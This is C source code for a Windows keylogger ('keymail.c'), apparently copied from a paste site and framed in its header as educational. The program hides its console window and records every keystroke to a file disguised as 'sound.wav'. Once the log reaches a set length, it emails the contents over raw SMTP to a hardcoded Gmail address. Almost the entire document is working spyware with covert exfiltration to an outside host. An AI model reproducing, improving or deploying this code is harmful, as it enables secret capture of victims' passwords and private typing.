· 6 years ago · Dec 22, 2019, 11:56 PM
1/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
2* *
3* File: keymail.c Ver. 0.7 *
4* *
5* Purpose: a stealth (somewhat) key logger, writes to a log file then sends *
6* and email to whoever is set in the #define options at compile time. *
7* This code is for educational uses, don't be an ass hat with it. *
8* White Scorpion (www.white-scorpion.nl) did the initial work on the key *
9* logger, but he has gone on to bigger and better things. *
10* This version was crafted by Irongeek (www.Irongeek.com), who tacked on *
11* some code to make it send emails, along with a few other changes. *
12* If some of the code is crappy, blame Irongeek and not White Scorpion. *
13* Please send Irongeek improvements and he will post the changes and give you *
14* credit for your contributions. *
15* *
16* This program is free software; you can redistribute it and/or *
17* modify it under the terms of the GNU General Public License *
18* as published by the Free Software Foundation; either version 2 *
19* of the License, or (at your option) any later version. *
20* *
21* This program is distributed in the hope that it will be useful, *
22* but WITHOUT ANY WARRANTY; without even the implied warranty of *
23* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
24* GNU General Public License for more details. *
25* *
26* You should have received a copy of the GNU General Public License *
27* along with this program; if not, write to the Free Software *
28* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
29* *
30* Change log: *
31* 1/3/06 On Ed Rguyl's recommendation I changed how malloc was used. *
32* 6/22/06 Added the date and time functionality using ctime and fixed *
33* a bug where subject was being defined twice.(ThVoidedLine) *
34* *
35* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
36/*
37Compile notes: I used Dev-C++ 4.9.9.2 to compie this. if you get an error like:
38 Linker error] undefined reference to `WSAStartup@8'
39Add this:
40 -lws2_32
41to Tools->Compiler Options under the section on compile flags.
42*/
43
44#include <windows.h>
45#include <stdio.h>
46#include <winuser.h>
47#include <windowsx.h>
48#include <time.h>
49int MailIt (char *mailserver, char *emailto, char *emailfrom,
50char *emailsubject, char *emailmessage);
51#define BUFSIZE 800
52#define waittime 500
53/*If you don't know the mail exchange server for an address for the following
54"nslookup -querytype=mx gmail.com" but replace gmail.com with the domain for
55whatever email address you want. YOU MUST CHANGE THESE SETTINGS OR
56IT WILL NOT WORK!!! */
57#define cmailserver "gmail-smtp-in.l.google.com"
58#define cemailto "irong33k@gmail.com"
59#define cemailfrom "irong33k@gmail.com"
60#define LogLength 100
61#define FileName "sound.wav"
62#define SMTPLog "ring.wav"
63#define cemailsubject "Logged"
64
65int test_key(void);
66int main(void)
67{
68 //Uncomment the lines below to put the keylogger in stealh mode.
69 HWND stealth; /*creating stealth */
70 AllocConsole();
71 stealth=FindWindowA("ConsoleWindowClass",NULL);
72 ShowWindow(stealth,0);
73
74 {FILE *file;
75 file=fopen(FileName,"a+");
76 time_t theTime=time(0);
77 fputs("\nStarted logging: ", file);
78 fputs(ctime(&theTime),file);
79 fclose(file);
80 }
81
82 /* if (test==2)
83 {//the path in which the file needs to be
84 char *path="c:\\%windir%\\svchost.exe";
85 create=create_key(path);
86 } */
87
88 int t=get_keys();
89 return t;
90}
91
92int get_keys(void)
93{
94int freadindex;
95char *buf;
96long len;
97FILE *file;
98file=fopen(FileName,"a+");
99
100
101 short character;
102 while(1)
103 {
104 sleep(10);/*to prevent 100% cpu usage*/
105 for(character=8;character<=222;character++)
106 {
107 if(GetAsyncKeyState(character)==-32767)
108 {
109 FILE *file;
110 file=fopen(FileName,"a+");
111 if(file==NULL)
112 {
113 return 1;
114 }
115 if(file!=NULL)
116 {
117 if((character>=39)&&(character<=64))
118 {
119 fputc(character,file);
120 fclose(file);
121 break;
122 }
123 else if((character>64)&&(character<91))
124 {
125 character+=32;
126 fputc(character,file);
127 fclose(file);
128 break;
129 }
130 else
131 {
132 switch(character)
133 {
134 case VK_SPACE:
135 fputc(' ',file);
136 fclose(file);
137 break;
138 case VK_SHIFT:
139 fputs("\r\n[SHIFT]\r\n",file);
140 fclose(file);
141 break;
142 case VK_RETURN:
143 fputs("\r\n[ENTER]\r\n",file);
144 fclose(file);
145 break;
146 case VK_BACK:
147 fputs("\r\n[BACKSPACE]\r\n",file);
148 fclose(file);
149 break;
150 case VK_TAB:
151 fputs("\r\n[TAB]\r\n",file);
152 fclose(file);
153 break;
154 case VK_CONTROL:
155 fputs("\r\n[CTRL]\r\n",file);
156 fclose(file);
157 break;
158 case VK_DELETE:
159 fputs("\r\n[DEL]\r\n",file);
160 fclose(file);
161 break;
162 case VK_OEM_1:
163 fputs("\r\n[;:]\r\n",file);
164 fclose(file);
165 break;
166 case VK_OEM_2:
167 fputs("\r\n[/?]\r\n",file);
168 fclose(file);
169 break;
170 case VK_OEM_3:
171 fputs("\r\n[`~]\r\n",file);
172 fclose(file);
173 break;
174 case VK_OEM_4:
175 fputs("\r\n[ [{ ]\r\n",file);
176 fclose(file);
177 break;
178 case VK_OEM_5:
179 fputs("\r\n[\\|]\r\n",file);
180 fclose(file);
181 break;
182 case VK_OEM_6:
183 fputs("\r\n[ ]} ]\r\n",file);
184 fclose(file);
185 break;
186 case VK_OEM_7:
187 fputs("\r\n['\"]\r\n",file);
188 fclose(file);
189 break;
190 case 187:
191 fputc('+',file);
192 fclose(file);
193 break;
194 case 188:
195 fputc(',',file);
196 fclose(file);
197 break;
198 case 189:
199 fputc('-',file);
200 fclose(file);
201 break;
202 case 190:
203 fputc('.',file);
204 fclose(file);
205 break;
206 case VK_NUMPAD0:
207 fputc('0',file);
208 fclose(file);
209 break;
210 case VK_NUMPAD1:
211 fputc('1',file);
212 fclose(file);
213 break;
214 case VK_NUMPAD2:
215 fputc('2',file);
216 fclose(file);
217 break;
218 case VK_NUMPAD3:
219 fputc('3',file);
220 fclose(file);
221 break;
222 case VK_NUMPAD4:
223 fputc('4',file);
224 fclose(file);
225 break;
226 case VK_NUMPAD5:
227 fputc('5',file);
228 fclose(file);
229 break;
230 case VK_NUMPAD6:
231 fputc('6',file);
232 fclose(file);
233 break;
234 case VK_NUMPAD7:
235 fputc('7',file);
236 fclose(file);
237 break;
238 case VK_NUMPAD8:
239 fputc('8',file);
240 fclose(file);
241 break;
242 case VK_NUMPAD9:
243 fputc('9',file);
244 fclose(file);
245 break;
246 case VK_CAPITAL:
247 fputs("\r\n[CAPS LOCK]\r\n",file);
248 fclose(file);
249 break;
250 default:
251 fclose(file);
252 break;
253 }
254 }
255 }
256 }
257 }
258 FILE *file;
259 file=fopen(FileName,"rb");
260 fseek(file,0,SEEK_END); //go to end
261 len=ftell(file); //get position at end (length)
262 if(len>=LogLength) {
263 fseek(file,0,SEEK_SET);//go to beg.
264 buf=(char *)malloc(len);//malloc buffer
265 freadindex=fread(buf,1,len,file);//read into buffer
266 buf[freadindex] = '\0';//Extra bit I have to add to make it a sting
267 MailIt( cmailserver, cemailto, cemailfrom, cemailsubject, buf);
268 fclose(file);
269 file=fopen(FileName,"w");
270 }
271
272 fclose(file);
273 //free (buf);
274
275 }
276 return EXIT_SUCCESS;
277}
278
279int MailIt (char *mailserver, char *emailto, char *emailfrom,
280char *emailsubject, char *emailmessage) {
281 SOCKET sockfd;
282 WSADATA wsaData;
283 FILE *smtpfile;
284
285 #define bufsize 300
286 int bytes_sent; /* Sock FD */
287 int err;
288 struct hostent *host; /* info from gethostbyname */
289 struct sockaddr_in dest_addr; /* Host Address */
290 char line[1000];
291 char *Rec_Buf = (char*) malloc(bufsize+1);
292 smtpfile=fopen(SMTPLog,"a+");
293 if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) {
294 fputs("WSAStartup failed",smtpfile);
295 WSACleanup();
296 return -1;
297 }
298 if ( (host=gethostbyname(mailserver)) == NULL) {
299 perror("gethostbyname");
300 exit(1);
301 }
302 memset(&dest_addr,0,sizeof(dest_addr));
303 memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);
304
305 /* Prepare dest_addr */
306 dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */
307 dest_addr.sin_port= htons(25); /* PORT defined above */
308
309 /* Get socket */
310
311 if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
312 perror("socket");
313 exit(1);
314 }
315 /* Connect !*/
316 fputs("Connecting....\n",smtpfile);
317
318 if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
319 perror("connect");
320 exit(1);
321 }
322 sleep(waittime);
323 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
324 fputs(Rec_Buf,smtpfile);
325 strcpy(line,"helo me.somepalace.com\n");
326 fputs(line,smtpfile);
327 bytes_sent=send(sockfd,line,strlen(line),0);
328 sleep(waittime);
329 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
330 fputs(Rec_Buf,smtpfile);
331 strcpy(line,"MAIL FROM:<");
332 strncat(line,emailfrom,strlen(emailfrom));
333 strncat(line,">\n",3);
334 fputs(line,smtpfile);
335 bytes_sent=send(sockfd,line,strlen(line),0);
336 sleep(waittime);
337 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
338 fputs(Rec_Buf,smtpfile);
339 strcpy(line,"RCPT TO:<");
340 strncat(line,emailto,strlen(emailto));
341 strncat(line,">\n",3);
342 fputs(line,smtpfile);
343 bytes_sent=send(sockfd,line,strlen(line),0);
344 sleep(waittime);
345 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
346 fputs(Rec_Buf,smtpfile);
347 strcpy(line,"DATA\n");
348 fputs(line,smtpfile);
349 bytes_sent=send(sockfd,line,strlen(line),0);
350 sleep(waittime);
351 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
352 fputs(Rec_Buf,smtpfile);
353 sleep(waittime);
354 strcpy(line,"To:");
355 strcat(line,emailto);
356 strcat(line,"\n");
357 strcat(line,"From:");
358 strcat(line,emailfrom);
359 strcat(line,"\n");
360 strcat(line,"Subject:");
361 strcat(line,emailsubject);
362 strcat(line,"\n");
363 strcat(line,emailmessage);
364 strcat(line,"\r\n.\r\n");
365 fputs(line,smtpfile);
366 bytes_sent=send(sockfd,line,strlen(line),0);
367 sleep(waittime);
368 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
369 fputs(Rec_Buf,smtpfile);
370 strcpy(line,"quit\n");
371 fputs(line,smtpfile);
372 bytes_sent=send(sockfd,line,strlen(line),0);
373 sleep(waittime);
374 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
375 fputs(Rec_Buf,smtpfile);
376 fclose(smtpfile);
377 #ifdef WIN32
378 closesocket(sockfd);
379 WSACleanup();
380 #else
381 close(sockfd);
382 #endif
383}